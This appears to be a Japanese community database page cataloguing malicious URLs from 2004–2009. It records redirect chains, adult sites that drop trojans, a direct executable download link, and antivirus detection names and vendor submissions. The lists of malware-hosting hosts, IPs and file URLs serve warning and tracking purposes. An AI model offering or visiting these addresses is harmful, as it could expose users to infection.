ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+TROJ_ANICMOO.X+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC ソースを見るとコード変換された部分がある。そこに以下のURLが隠れている。 //game4all.biz/adv/120/new.php 閉じると 「ALFASEARCH」という検索サイトと、以下のURLのアダルトサイトを表示するが、この下のURLは閉じると、色々なアダルトサイトを表示していく。 //www.brotos.gratishost.com/ |
| [2005/04/09] | 踏むと海外アダルトサイト。閉じると制限サイトらしきページを開いてくるらしいが、私の環境では確認できなかった。
サムネイル画像をクリックするとウィルス憑きサイトに飛ばされることがある。 それはサムネイル画像のリンク先は「画像」では無く、//pornxxx.just-a-porn.com/go.php にリンクされているため。 詳細は//pornxxx.just-a-porn.com/go.phpのURL解説を参照。 |
| [2005/04/09] | 踏むたびに飛び先が違う。20回程度確認。結果は以下。重複があったため、重複分は除外。
|
| [2006/09/17] | 踏むと海外アダルトサイト。確認した時はこのページ表示までバスター無反応だった。
しかし、ソースを取得しようとするとウィルス名:JS_Generic を検出する。 |
| [2008/09/30] | ウィルス名:TSPY_BANKER.BAO |
| [2008/12/13] | ウィルス名:TROJ_EXCHANGE.AJ |
| [2005/10/16] | /image1.html の中の数字は 1 から 105 まである。つまり、以下のよう。
//postgirls.freepimphost.com/las-011/imagepages/image1.html 〜//postgirls.freepimphost.com/las-011/imagepages/image105.html 代表して /image1.html を鑑定。 踏むと、画像は表示されるが、1秒後に別のURLに飛ばされ、ウィルスを検出したり、検出しなかったりする。 何回か確認すると、ウィルスを検出する割合は大体9割と判断。 飛ばされたURLは以下のどれかだった。そのどれかによって、ウィルスを検出したり、検出しなかったりする。 //205.252.250.226/zator/adv3006/ //69.50.190.135/?to=rush&from=redin&type=cns //82.179.166.145/index2.php?aid=x19 //toolbarpartner.com/adverts/r222/index.html //85.255.113.242/adv/012/ 何回か確認して検出した時のウィルス名は以下であった。 ウィルス名:JS_INOR.AB+VBS_PSYME.AN+JAVA_BYTEVER.A ウィルス名:TROJ_DLOADER.KZ+TROJ_ANICMOO.A+JAVA_BYTEVER.A+JAVA_BYTEVER.K ウィルス名:JS_PSYME.AF+JAVA_BYTEVER.A ウィルス名:JS_PSYME.AF+JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 ソースを見ると1秒REFRESHで以下の @ か A に飛び、window.openで B を表示するようになっている。 どのURLもランダムで色々なURLに飛ぶようになっている。 @、//69.50.190.135/?to=rush&from=gallz&type=redz A、//69.50.190.135/?to=rush&from=gall&type=red B、//69.50.190.135/?to=rush&from=gall&type=red |
| [2005/10/16] | 他の方の鑑定結果は以下の「」内。
「踏んでみました。そのページだけならPC無害ですが、画像のリンク先がjpgでなくhtmlになっているのがミソで、飛び先でVB2005反応しました。概要説明です↓。 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_INOR.AB ただ、当環境では既に制限付きサイトとして認識されておりブロック対象になっているので、環境によっては他の有害物件を拾っている可能性もあります。 アンチウイルスソフト・アンチスパイソフトでのスキャンをお勧めします。 入れてなければオンラインスキャン等を参考にして下さい。」 |
| [2005/10/16] | 踏むと海外アダルトサムネイルページ。このページまで無害。ただし、このページのサムネイル画像のリンク先は要注意。
詳細は下のURL解説を参照。ちなみに黄色部分の数字は 105 まである。 //postgirls.freepimphost.com/las-011/imagepages/image1.html |
| [2005/10/16] | /image1.html の中の数字は 1 から 101 まである。つまり、以下のよう。
//postgirls.freepimphost.com/las-021/imagepages/image1.html 〜//postgirls.freepimphost.com/las-021/imagepages/image101.html 代表して /image1.html を鑑定。 踏むと、画像は表示されるが、1秒後に別のURLに飛ばされ、ウィルスを検出したり、検出しなかったりする。 何回か確認すると、ウィルスを検出する割合は大体9割と判断。 飛ばされたURLは以下のどれかだった。そのどれかによって、ウィルスを検出したり、検出しなかったりする。 //205.252.250.226/zator/adv3006/ //69.50.190.135/?to=rush&from=redin&type=cns //82.179.166.145/index2.php?aid=x19 //toolbarpartner.com/adverts/r222/index.html //85.255.113.242/adv/012/ 何回か確認して検出した時のウィルス名は以下であった。 ウィルス名:JS_INOR.AB+VBS_PSYME.AN+JAVA_BYTEVER.A ウィルス名:TROJ_DLOADER.KZ+TROJ_ANICMOO.A+JAVA_BYTEVER.A+JAVA_BYTEVER.K ウィルス名:JS_PSYME.AF+JAVA_BYTEVER.A ウィルス名:JS_PSYME.AF+JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 ソースを見ると1秒REFRESHで以下の @ か A に飛び、window.openで B を表示するようになっている。 どのURLもランダムで色々なURLに飛ぶようになっている。 @、//69.50.190.135/?to=rush&from=gallz&type=redz A、//69.50.190.135/?to=rush&from=gall&type=red B、//69.50.190.135/?to=rush&from=gall&type=red |
| [2005/10/16] | 踏むと海外アダルトサムネイルページ。このページまで無害。ただし、このページのサムネイル画像のリンク先は要注意。
詳細は下のURL解説を参照。ちなみに黄色部分の数字は 101 まである。 //postgirls.freepimphost.com/las-021/imagepages/image1.html |
| [2009/05/09] | ファイルサイズ:136 KB 。ウィルス名:TROJ_SMALL.GNG |
| [2008/08/26] | ウィルス名:TSC_GENCLEAN+TROJ_EXCHANGE.AF |
| [2008/09/28] | ウィルス名:TSPY_WOW.BV |
| [2008/09/30] | ウィルス名:TROJ_DELF.CYR |
| [2008/09/28] | ウィルス名:TROJ_GAMETHI.BSF |
| [2008/09/28] | ウィルス名:PAK_Generic.001 |
| [2008/09/28] | ウィルス名:TSPY_ONLINEG.VPP |
| [2008/09/28] | ウィルス名:TSPY_ONLINEG.VPM |
| [2008/09/28] | ウィルス名:CRYP_MANGLED |
| [2004/04/30] | ウィルス名:JAVA_BYTEVER.A。脱出結構困難な上、手間取るたびにウイルスアラートが出る。 |
| [2004/10/21] | ウィルス名:JAVA_BYTEVER.A |
| [2005/11/27] | 踏むと少し経って「stealth-redirector-2.0.zip」というファイルをDL出来る。
しかし、ウィルス名:TROJ_CLIENT.A+TROJ_PROXY.DLL+SPYW_STELREDIR.A を検出。 |
| [2008/12/13] | ウィルス名:TROJ_EXCHANGE.BI |
| [2004/03/20] | 海外アダルトサイトから「あなたのマシンにスパイウェアをインストールしました」みたいな英語表記のページに飛ばされ、IPを抜かれる。 |
| [2008/08/15] | ウィルス名:TSC_GENCLEAN+TROJ_AGENT.OLL |
| [2008/08/15] | Location ヘッダで以下のファイルが落ちてくるが、ウィルス名:TSC_GENCLEAN+TROJ_AGENT.OLL を検出。
//presspictures.home.pl/mgp.exe |
| [2005/09/25] | 「ぷりてぃむーびー」という日本語のアダルトサイト。
悪質サイトデータベースにワンクリサイトとして登録されているURL。 画像等をクリックするとexeファイルをDLさせようとしてくる。 このexeにはバスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → Trojan/Drop.HSP.a.1.A ArcaVir → Trojan.Killfiles.U ClamAV → Trojan.W32.Msbook F-Prot Antivirus → dropper for W32/Trojan.YX Kaspersky Anti-Virus → Trojan-Clicker.Win32.HSP.a Norman Virus Control → W32/Agent.GBJ |
| [2008/12/13] | ウィルス名:TROJ_NUWAR.GGN |
| [2006/08/01] | ウィルス名:DIAL_85.A |
| [2004/09/07] | 「IEのドラッグ&ドロップの脆弱性を突くトロイの木馬「Akak」出現」に書いてある悪意あるWebサイト。
現在WinXP SP2でも未対応。バッチは出ていない。 |
| [2005/02/03] | 404を確認。 |
| [2005/06/07] | formatc はDOS format 画面をフェイクするイタズラプログラムらしい。
日本語環境で遊ぶには事前に us [Enter] として画面モードを切り替えないといけないかも。 bertram [Enter] で抜けられる。 DOS の知識が必要。踏むと見知らぬ黒いページが出てくる。 |
| [2005/06/07] | DLしてメモ帳で開いてみるとコマンドが文字化け。
試しに実行して見るとDOSプロンプトが一瞬開いただけで終わり。 再起動後も、変化無し。単なるジョークだと思われる。 |
| [2006/02/01] | 再確認。 ウィルス名:JOKE_FORMAT.A [ ウィルスバスター ] ウィルス名:Trojan.Joke.Format.A [ BitDefender ] |
| [2005/03/31] | 海外エロサイトでウィルス名:JAVA_BYTEVER.A-1 を検出。閉じると //allteenmodel.com/?prize4u.net のアダルトサイト表示。別窓かなりの数あり。 |
| [2005/03/30] | 「My BBS」という掲示板だが、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.C を検出。 |
| [2005/04/12] | 改めて確認。ウィルス名:TROJ_ANICMOO.D+JAVA_BYTEVER.A+JAVA_BYTEVER.C
「My BBS」という掲示板だが投稿者により、IFRAMEを使い、//freetop.ru/?m を呼ぶ。 |
| [2008/12/13] | ウィルス名:TROJ_EXCHANGE.AK |
| [2004/04/20] | 無限JavaScript。 |
| [2006/10/16] | 2006/10/09 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.ESL として検出するよう対応、とのこと。 実際に 2006/10/09 にDLしたファイルからウィルス名:TROJ_DLOADER.ESL を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 新しいファイルに置き換えられている可能性がある。 |
| [2006/10/09] | ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y |
| [2006/07/22] | ウィルス名:TROJ_ADLOAD.HN |
| [2006/07/16] | バスター無反応だが、他アンチウィルスソフトでウィルス名:Downloder.Adload.ai を検出するらしい。 |
| [2006/07/20] | 2006/07/12 にトレンドマイクロ社にファイルを提出。
本日、連絡があり、ウイルスパターンファイル 3.569.00 にてウィルス名:TROJ_ADLOAD.DI として対応とのこと。当ファイルをDLしてウィルスを検出することを確認。 |
| [2006/07/20] | 他の方の結果では、
「ANTIDOTE で Trojan-Downloader.Win32.Adload.ai と判定。」 |
| [2006/08/05] | 再確認すると、今度はウィルス名:TROJ_ADLOAD.HZ を検出。ウィルス名:TROJ_ADLOAD.DI は未検出だった。 |
| [2006/08/11] | 2006/08/05 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_ADLOAD.II として検出するよう対応したとのこと。 2006/08/05 にDLしたファイルからウィルス名:TROJ_ADLOAD.II を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
| [2006/08/03] | 2006/07/22 にトレンドマイクロ社にファイルを提出。
2006/07/26 に連絡があり、ウィルス名:TROJ_ADLOAD.GV として検出るすよう対応とのこと。 2006/07/22 にDLしたファイルからウィルス名:TROJ_ADLOAD.GV を検出するが、当該URLからDLしてみると、バスター無反応。 トレンドマイクロ社に2006/07/26 にDLしたファイルで再調査依頼。 今日、その再調査の結果連絡があり、ウィルス名:TROJ_ADLOAD.NAR として検出るすよう対応とのこと。 しかし、今日、当該URLからDLしてみると、バスター無反応であった。 これらのことから判断すると、このURLは新しいファイルに随時置き換えられるものと推測される。 |
| [2006/08/11] | 2006/08/05 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_ADLOAD.II として検出するよう対応したとのこと。 2006/08/05 にDLしたファイルからウィルス名:TROJ_ADLOAD.II を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
| [2006/08/11] | 2006/08/05 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_ADLOAD.II として検出するよう対応したとのこと。 2006/08/05 にDLしたファイルからウィルス名:TROJ_ADLOAD.II を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
| [2006/11/07] | 2006/11/01 にトレンドマイクロ社にファイルを再提出。
今日、その結果の連絡があり、ウィルス名:TROJ_ADLOAD.QH として検出するよう対応、とのこと。 実際に 2006/11/01 にDLしたファイルからウィルス名:TROJ_ADLOAD.QH を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。新しいファイルに置き換えられている。 |
| [2006/08/11] | 2006/08/05 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_ADLOAD.II として検出するよう対応したとのこと。 2006/08/05 にDLしたファイルからウィルス名:TROJ_ADLOAD.II を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
| [2006/07/26] | 2006/07/22 にトレンドマイクロ社にファイルを提出。
今日、連絡があり、ウイルスパターンファイル 3.605.00 にてウィルス名:TROJ_ADLOAD.HS として対応とのこと。 実際にファイルをDLしてウィルス名:TROJ_ADLOAD.HS を検出することを確認。 |
| [2006/08/11] | 2006/08/05 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_ADLOAD.II として検出するよう対応したとのこと。 2006/08/05 にDLしたファイルからウィルス名:TROJ_ADLOAD.II を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
| [2006/07/22] | ウィルス名:TROJ_ADLOAD.HO |
| [2006/08/11] | 2006/08/05 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_ADLOAD.II として検出するよう対応したとのこと。 2006/08/05 にDLしたファイルからウィルス名:TROJ_ADLOAD.II を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
| [2008/06/29] | 踏むと こんな感じ のサイト。ウィルスバスターが「危険なWebサイト」として警告する。
詳細は以下の他の方の結果を参照。 「mazafaka.ruというタイトルの外国の地図やProxy:Portなどが見れるロシアのサイトへ行きました。 当環境ではそこまで Kaspersky 無反応なもののマカフィーアドバイザーでアドウェア、スパイウェア、その他の怪しいプログラムとみなされるプログラムが見つかりました。と有害判定を受けています。 client.rar Generic BackDoor.d trojan Mazafaka.Ru_e-zine_winter2004-2005(001).zip Exploit-Generic trojan,Linux/Phobi trojan server.rar Generic BackDoor.d trojan ファイルにもウイルスが検出されるようなので踏まないほうがいいでしょう。」 |
| [2004/10/05] | ウィルス名:HTML_CRASHER.A |
| [2006/09/14] | ウィルス名:TROJ_Generic |
| [2006/11/16] | ウィルス名:SPYW_E2GIVE.C |
| [2007/01/27] | 踏むと「premovie.exe」なるファイルが落ちてくるが、ウィルス名:TSPY_VB.CEV を検出。
このURLの「…movie1013.wmv」の4桁の数字は他にも相当数ある模様。 |
| [2007/02/17] | 踏むと「premovie.exe」なるファイルが落ちてくるが、ウィルス名:TSPY_VB.CHI を検出。 |
| [2004/07/01] | ウィルス名:MHTMLRedir.Exploit 他複数確認。怪しいDL要求とダイヤログが開くサイト。 |
| [2004/04/23] | 炉サイトだがメッセージでOKを押すとスパイウェアがインストールされる。 |
| [2004/06/26] | 海外ロリータサイトだがスパイウェアを仕込まれる。 |
| [2004/07/06] | スパイウェア注意。海外ロリータ系のアダルト画像サムネイルページ。
クリックで拡大だが、ホストが晒されて、お前のPCは危ないからコレ入れろ、みたいなポプアプが開く。更に何かのDL要求もあり。 |
| [2004/09/22] | ウィルス名:TROJ_BRISS.H+SPYW_BRISS.A |
| [2005/03/06] | ウィルス名:ADW_WINAD.A |
| [2005/03/06] | ウィルス名:ADW_WUPD.A |
| [2005/02/28] | ウィルス名:ADW_WINAD.A |
| [2006/12/14] | 「Setup.exe」が落ちてくる。2006/12/02 にトレンドマイクロ社に「Setup.exe」ファイルを提出。
2006/12/08 にその結果の連絡があり、ウィルス名:ADW_ZANGOSA.I として検出するよう対応、とのこと。 実際に 2006/12/02 にDLしたファイルからウィルス名:ADW_ZANGOSA.I を検出することを確認。 しかし、今日改めて当該URLからDLしてみると、バスター無反応。 新しいファイルに置き換えられている。 |
| [2007/02/20] | 2007/02/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.ITN として検出するよう対応、とのこと。 実際に 2007/02/12 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DLOADER.ITN を検出することを確認。 2007/02/12 から今日までのファイルの置き換えは無いと推測される。 |
| [2007/02/20] | 2007/02/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.ITN として検出するよう対応、とのこと。 実際に 2007/02/12 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DLOADER.ITN を検出することを確認。 2007/02/12 から今日までのファイルの置き換えは無いと推測される。 |
| [2004/08/25] | スキャンすると ad-aware がスパイウェアらしきものを検出。サムネイルクリックがヤバいらしい。 |
| [2009/08/03] | ファイルサイズ:12.5 KB 。ウィルス名:TROJ_ADLOAD.GV |
| [2009/08/03] | ファイルサイズ:39.0 KB 。ウィルス名:HKTL_EVID |
| [2009/08/03] | ファイルサイズ:7.58 KB 。ウィルス名:TROJ_DLOADE.AUS |
| [2009/08/03] | ファイルサイズ:87.0 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応がある。
高い確率でスパイウェアと思われる。 |
| [2009/08/03] | ファイルサイズ:38.5 KB 。ウィルス名:TROJ_DLOADER.WGT |
| [2009/08/03] | ファイルサイズ:42.5 KB 。ウィルス名:HKTL_EVID |
| [2009/08/03] | ファイルサイズ:7.57 KB 。ウィルス名:MAL_DLDER |
| [2008/08/15] | ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AHEF |
| [2009/05/09] | ファイルサイズ:1.89 MB 。ウィルス名:CRYP_FAKEAV-12 |
| [2009/08/03] | 真っ白なページだが、ウィルス名:JS_ECIN.A を検出。 |
| [2009/05/09] | ファイルサイズ:22.0 KB 。ウィルス名:PAK_GENERIC.001 |
| [2009/05/09] | ファイルサイズ:15.5 KB 。ウィルス名:PAK_GENERIC.001 |
| [2009/08/03] | 再確認。ファイルサイズ:15.5 KB 。ウィルス名:TROJ_DLOADER.TMR |